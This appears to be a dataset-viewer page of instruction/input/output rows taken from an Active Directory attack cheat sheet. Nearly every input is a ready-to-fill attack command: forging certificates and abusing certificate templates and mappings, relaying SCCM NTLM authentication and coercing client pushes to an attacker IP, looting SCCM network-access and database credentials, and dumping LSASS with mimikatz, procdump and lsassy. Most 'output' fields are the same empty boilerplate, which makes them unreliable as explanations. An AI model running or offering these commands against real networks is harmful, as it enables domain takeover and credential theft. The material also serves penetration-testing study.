instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Vulnerable PKI Object access control | Golden certificate | Note or procedural step under 'Vulnerable PKI Object access control'. |
Vulnerable PKI Object access control | certipy ca -backup -u <user>@<domain> -hashes <hash_nt> -ca <ca_name> -debug -target <ca_ip> | Note or procedural step under 'Vulnerable PKI Object access control'. |
Vulnerable PKI Object access control | certipy forge -ca-pfx '<adcs>.pfx' -upn administrator@<domain> # Pass the Certificate | Note or procedural step under 'Vulnerable PKI Object access control'. |
Misconfigured Certificate Authority | ESC6 | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | Abuse ATTRIBUTESUBJECTALTNAME2 flag set on CA you can choose any certificate template that permits client authentication | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | ESC1 | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | ESC11 | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | ntlmrelayx.py -t rpc://<ca_ip> -smb2support -rpc-mode ICPR -icpr-ca-name <ca_name> | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt | Tool or command referenced under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | gettgtpkinit.py -pfx-base64 $(cat cert.b64) <domain>/<dc_name>$ <ccache_file> | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | certipy relay -target rpc://<ip_ca> -ca '<ca_name>' | Note or procedural step under 'Misconfigured Certificate Authority'. |
Misconfigured Certificate Authority | certipy auth -pfx <certificate> -dc-ip <dc_ip> #Pass the Ticket #DCSYNC #Domain Admin | Note or procedural step under 'Misconfigured Certificate Authority'. |
Abuse Certificate Mapping | ESC9/ESC10 (implicit) | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | certipy shadow auto -username <accountA>@<domain> -p <passA> -account <accountB> | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | ESC9/ESC10 (Case 1) | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | certipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn Administrator | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | ESC9 | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | certipy req -username <accountB>@<domain> -hashes <hashB> -ca <ca_name> -template <vulnerable template> #reset accountB UPN | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | ESC10 (case 1) | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | certipy req -username <accountB>@<domain> -hashes <hashB> -ca <ca_name> -template <any template with client auth> #reset accountB UPN | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | ESC10 (Case 2) | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | certipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn '<dc_name$>@<domain>' | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | ESC10 Case1 | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | reset accountB UPN | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | certipy account update -username <accountA>@<domain> -password <passA> -user <accountB> -upn <accountB>@<domain> | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | [Kerberos Mapping] ESC9/ESC10(Case 1) #Pass The Certificate | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | [Schannel Mapping] ESC9/ESC10 (Case 2) #Pass The Certificate | Note or procedural step under 'Abuse Certificate Mapping'. |
Abuse Certificate Mapping | ESC14 (explicit) | Note or procedural step under 'Abuse Certificate Mapping'. |
recon | sccmhunter.py find -u <user> -p <password> -d <domain> -dc-ip <dc_ip> -debug | Note or procedural step under 'recon'. |
recon | sccmhunter.py show -all | Note or procedural step under 'recon'. |
recon | ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> sccm | Note or procedural step under 'recon'. |
recon | nxc smb <sccm_server> -u <user> -p <password> -d <domain> --shares | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Creds-1 No credentials | Extract from pxe See no creds | Note or procedural step under 'Creds-1 No credentials'. |
Creds-1 No credentials > PXE | NAA credentials | Note or procedural step under 'Creds-1 No credentials > PXE'. |
Creds-1 No credentials > PXE | User + Pass | Note or procedural step under 'Creds-1 No credentials > PXE'. |
Elevate-1:Relay on site systems Simple user | coerce sccm site server | Note or procedural step under 'Elevate-1:Relay on site systems Simple user'. |
Elevate-1:Relay on site systems Simple user | ntlmrelayx.py -tf <site_systems> -smb2support #Admin on Site system | Note or procedural step under 'Elevate-1:Relay on site systems Simple user'. |
Elevate-2:Force client push Simple user | ntlmrelayx.py -t <sccm_server> -smb2support -socks # listen connection | Note or procedural step under 'Elevate-2:Force client push Simple user'. |
Elevate-2:Force client push Simple user | SharpSCCM.exe invoke client-push -mp <sccm_server>.<domain> -sc <site_code> -t <attacker_ip> # Launch client push install | Note or procedural step under 'Elevate-2:Force client push Simple user'. |
Elevate-2:Force client push Simple user | proxychains smbexec.py -no-pass <domain>/<socks_user>@<sccm_server> | Note or procedural step under 'Elevate-2:Force client push Simple user'. |
Elevate-2:Force client push Simple user | cleanup #Admin | Note or procedural step under 'Elevate-2:Force client push Simple user'. |
Elevate-3:Automatic client push Simple user | Create DNS A record for non existing computer x | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
Elevate-3:Automatic client push Simple user | dnstool.py -u '<domain>\<user>' -p <pass> -r <newcomputer>.<domain> -a add -t A -d <attacker_ip> <dc_ip> | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
Elevate-3:Automatic client push Simple user | Enroll new computer x in AD then remove host SPN from the machine account | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
Elevate-3:Automatic client push Simple user | setspn -D host/<newcomputer> <newcomputer> setspn -D host/<newcomputer>.<domain> <newcomputer> | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
Elevate-3:Automatic client push Simple user | wait 5m for client push | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
Elevate-3:Automatic client push Simple user | ntlmrelayx.py -tf <no_signing_target> -smb2support -socks | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
Elevate-3:Automatic client push Simple user | cleanup #Relay ntlm | Note or procedural step under 'Elevate-3:Automatic client push Simple user'. |
CRED-6 Loot creds | SCCM SMB service (445/TCP) on a DP | Note or procedural step under 'CRED-6 Loot creds'. |
CRED-6 Loot creds | cmloot.py <domain>/<user>:<password>@<sccm_dp> -cmlootinventory sccmfiles.txt | Note or procedural step under 'CRED-6 Loot creds'. |
CRED-6 Loot creds | SCCM HTTP service (80/TCP or 443/TCP) on a DP | Note or procedural step under 'CRED-6 Loot creds'. |
CRED-6 Loot creds | SCCMSecrets.py policies -mp http://<management_point> -u '<machine_account>$' -p '<machine_password>' -cn '<client_name>' | Note or procedural step under 'CRED-6 Loot creds'. |
CRED-6 Loot creds | SCCMSecrets.py files -dp http://<distribution_point> -u '<user>' -p '<password>' | Note or procedural step under 'CRED-6 Loot creds'. |
CRED-6 Loot creds | sccm-http-looter -server <ip_dp> | Note or procedural step under 'CRED-6 Loot creds'. |
Takeover-1:relay to mssql db Simple user | SCCM MSSQL != SSCM server | Note or procedural step under 'Takeover-1:relay to mssql db Simple user'. |
Takeover-1:relay to mssql db Simple user | sccmhunter.py mssql -u <user> -p <password> -d <domain> -dc-ip <dc_ip> -debug -tu <target_user> -sc <site_code> -stacked | Note or procedural step under 'Takeover-1:relay to mssql db Simple user'. |
Takeover-1:relay to mssql db Simple user | ntlmrelayx.py -smb2support -ts -t mssql://<sccm_mssql> -q "<query>" | Note or procedural step under 'Takeover-1:relay to mssql db Simple user'. |
Takeover-1:relay to mssql db Simple user | coerce sccm_mssql -> attacker | Note or procedural step under 'Takeover-1:relay to mssql db Simple user'. |
Takeover-1:relay to mssql db Simple user | sccmhunter.py admin -u <target_user>@<domain> -p '<password>' -ip <sccm_ip> #SCCM ADMIN | Note or procedural step under 'Takeover-1:relay to mssql db Simple user'. |
Takeover-2:relay to mssql server Simple user | SCCM MSSQL != SSCM server | Note or procedural step under 'Takeover-2:relay to mssql server Simple user'. |
Takeover-2:relay to mssql server Simple user | ntlmrelayx.py -t <sccm_mssql> -smb2support -socks | Note or procedural step under 'Takeover-2:relay to mssql server Simple user'. |
Takeover-2:relay to mssql server Simple user | coerce sccm_server | Note or procedural step under 'Takeover-2:relay to mssql server Simple user'. |
Takeover-2:relay to mssql server Simple user | proxychains smbexec.py -no-pass <domain>/'<sccm_server>$'@<sccm_ip> #Admin MSSQL | Note or procedural step under 'Takeover-2:relay to mssql server Simple user'. |
Creds-2:Policy Request Credentials Simple user | add computer | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-2:Policy Request Credentials Simple user | sccmwtf.py newcomputer newcomputer.<domain> <target> '<domain>\<computer_added>$' '<computer_pass>' | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-2:Policy Request Credentials Simple user | get NetworkAccessUsername and NetworkAccessPassword | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-2:Policy Request Credentials Simple user | policysecretunobfuscate.py | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-2:Policy Request Credentials Simple user | delete device created after sccmadmin #User + Pass | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-2:Policy Request Credentials Simple user | SharpSCCM.exe get secrets -r newcomputer -u <computer_added>$ -p <computer_pass>" | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-2:Policy Request Credentials Simple user | cleanup #User + Pass | Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'. |
Creds-3Creds-4 Computer Admin user | dploot.py sccm -u <admin> -p '<password>' <sccm_target> #NAA credentials | Note or procedural step under 'Creds-3Creds-4 Computer Admin user'. |
Creds-3Creds-4 Computer Admin user | sccmhunter.py dpapi -u <admin> -p '<password>' -target <sccm_target> -debug #NAA credentials | Note or procedural step under 'Creds-3Creds-4 Computer Admin user'. |
Creds-3Creds-4 Computer Admin user | SharpSCCM.exe local secrets -m disk #NAA credentials | Note or procedural step under 'Creds-3Creds-4 Computer Admin user'. |
Creds-3Creds-4 Computer Admin user | SharpSCCM.exe local secrets -m wmi #NAA credentials | Note or procedural step under 'Creds-3Creds-4 Computer Admin user'. |
Creds-5 SCCM admin | secretsdump.py <domain>/<admin>:'<pass>'@<sccm_target> | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Creds-5 SCCM admin | mssqlclient.py -windows-auth -hashes '<sccm_target_hashNT>' '<domain>/<sccm_target>$'@<sccm_mssql> | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | use CM_<site_code>; | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | SELECT * FROM SC_UserAccount; | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | sccmdecryptpoc.exe <cyphered_value> #Site DB credentials | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | get_device <hostname> | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | interact <device_id> | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | script xploit.ps1 #Site DB credentials | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | EXEC-1/2 SCCM admin | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | SharpSCCM.exe exec -p <binary> -d <device_name> -sms <SMS_PROVIDER> -sc <SITECODE> --no-banner #lat | Note or procedural step under 'Creds-5 SCCM admin'. |
Creds-5 SCCM admin | sccmhunter.py admin -u <user>@<domain> -p '<password>' -ip <sccm_ip> #lat | Note or procedural step under 'Creds-5 SCCM admin'. |
Cleanup | SharpSCCM.exe get devices -sms <SMS_PROVIDER> -sc <SITECODE> -n <NTLMRELAYX_LISTENER_IP> -p "Name" -p "ResourceId" -p "SMSUniqueIdentifier" | Note or procedural step under 'Cleanup'. |
Cleanup | SharpSCCM.exe remove device GUID:<GUID> -sms <SMS_PROVIDER> -sc <SITECODE> | Note or procedural step under 'Cleanup'. |
Post exploit | as sccm admin | Note or procedural step under 'Post exploit'. |
Post exploit | SCCMHound.exe --server <server> --sitecode <sitecode> | Note or procedural step under 'Post exploit'. |
Post exploit | Users sessions | Note or procedural step under 'Post exploit'. |
Admin access | Extract credentials from LSASS.exe | Note or procedural step under 'Admin access'. |
Admin access | LSASS as protected process | Note or procedural step under 'Admin access'. |
Admin access | PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp #before 2022-07-22 update | Note or procedural step under 'Admin access'. |
Admin access | mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe" "!-" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Admin access | Extract LSASS secrets | Note or procedural step under 'Admin access'. |
Admin access | procdump.exe -accepteula -ma lsass.exe lsass.dmp | Note or procedural step under 'Admin access'. |
Admin access | mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Admin access | msf> load kiwi creds_all | Tool or command referenced under 'Admin access'. |
Admin access | nxc smb <ip_range> -u <user> -p <password> -M lsassy | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Admin access | lsassy -d <domain> -u <user> -p <password> <ip> | Note or procedural step under 'Admin access'. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.